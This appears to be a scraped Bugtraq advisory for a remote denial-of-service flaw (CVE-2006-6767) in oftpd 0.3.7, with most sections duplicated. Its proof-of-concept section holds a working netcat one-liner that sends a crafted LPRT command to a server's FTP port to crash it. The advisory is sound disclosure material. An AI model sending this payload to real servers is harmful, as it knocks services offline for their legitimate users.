Oftpd Unsupported Address Family Remote Denial of Service Vulnerability
BID:22073
Info
Oftpd Unsupported Address Family Remote Denial of Service Vulnerability
| Bugtraq ID: | 22073 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2006-6767 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 15 2007 12:00AM |
| Updated: | Jan 16 2007 10:00PM |
| Credit: | This issue was disclosed in the Gentoo referenced advisory. |
| Vulnerable: |
oftpd oftpd 0.3.7 |
| Not Vulnerable: | |
Discussion
Oftpd Unsupported Address Family Remote Denial of Service Vulnerability
Oftpd Server is prone to a remote denial-of-service vulnerability because it mishandles unexpected user-supplied input.
Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users.
Oftpd Server 0.3.7 is reported vulnerable; other versions may also be affected.
Oftpd Server is prone to a remote denial-of-service vulnerability because it mishandles unexpected user-supplied input.
Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users.
Oftpd Server 0.3.7 is reported vulnerable; other versions may also be affected.
Exploit / POC
Oftpd Unsupported Address Family Remote Denial of Service Vulnerability
An attacker may exploit this issue through an FTP client.
The following exploit is available:
nc www.example.com 21 <<< "LPRT 1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176"
220 Service ready for new user.
521 Only IPv4 supported, address family (4)
An attacker may exploit this issue through an FTP client.
The following exploit is available:
nc www.example.com 21 <<< "LPRT 1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176"
220 Service ready for new user.
521 Only IPv4 supported, address family (4)
Solution / Fix
Oftpd Unsupported Address Family Remote Denial of Service Vulnerability
Solution:
Currently we are not aware of any solutions for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Please see the referenced advisories.
Solution:
Currently we are not aware of any solutions for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Please see the referenced advisories.
References
Oftpd Unsupported Address Family Remote Denial of Service Vulnerability
References:
References:
- Oftpd Homepage (Oftpd)